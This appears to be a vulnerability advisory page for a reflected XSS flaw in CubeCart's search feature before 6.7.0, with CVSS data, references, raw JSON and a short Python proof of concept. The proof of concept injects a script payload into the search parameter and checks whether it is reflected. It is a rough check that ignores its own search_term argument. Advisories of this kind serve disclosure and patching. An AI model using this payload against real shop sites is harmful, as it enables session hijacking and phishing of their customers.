Security Vulnerability Report
CVE-2026-44376 CVSS 6.1 MEDIUM

CVE-2026-44376

Published: 2026-05-13 21:16:48
Last Modified: 2026-05-14 16:49:19

Description

CubeCart is an ecommerce software solution. Prior to 6.7.0, an unauthenticated Reflected XSS vulnerability exists in the CubeCart v6.x search feature. Due to a logic flaw in classes/catalogue.class.php, user input is reflected without sanitization only when a search returns exactly one product. This flaw bypasses current filters, allowing an attacker to execute malicious JavaScript in the victim's browser, leading to session hijacking, site defacement, or phishing. This vulnerability is fixed in 6.7.0.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CubeCart v6.x < 6.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-44376
# Reflected XSS in CubeCart Search (Single Result)
import requests


def check_poc(target_url, search_term):
    # Payload to inject
    xss_payload = "<script>alert('CVE-2026-44376');</script>"

    # Construct the search URL
    # Note: The search parameter name might vary (e.g., 'search', 'q')
    exploit_url = f"{target_url}/index.php?_a=search&search_query={xss_payload}"

    try:
        response = requests.get(exploit_url)

        # Check if payload is reflected in the response (unfiltered)
        if xss_payload in response.text:
            print(f"[+] Potential XSS found if search returns exactly 1 result.")
            print(f"[+] URL: {exploit_url}")
        else:
            print("[-] Payload not reflected or filtered.")
    except Exception as e:
        print(f"Error: {e}")


# Example usage
# check_poc("http://target-cubecart-site.com", "product_name")
```

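References

https://github.com/cubecart/v6/commit/b9d03e20b9d0f443f8ea55fd834e348438e2cc0c
https://github.com/cubecart/v6/security/advisories/GHSA-gvcp-wpvp-c6f7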

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44376", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:48.183", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeCart is an ecommerce software solution. Prior to 6.7.0, an unauthenticated Reflected XSS vulnerability exists in the CubeCart v6.x search feature. Due to a logic flaw in classes/catalogue.class.php, user input is reflected without sanitization only when a search returns exactly one product. This flaw bypasses current filters, allowing an attacker to execute malicious JavaScript in the victim's browser, leading to session hijacking, site defacement, or phishing. This vulnerability is fixed in 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/cubecart/v6/commit/b9d03e20b9d0f443f8ea55fd834e348438e2cc0c", "source": "[email protected]"}, {"url": "https://github.com/cubecart/v6/security/advisories/GHSA-gvcp-wpvp-c6f7", "source": "[email protected]"}]}}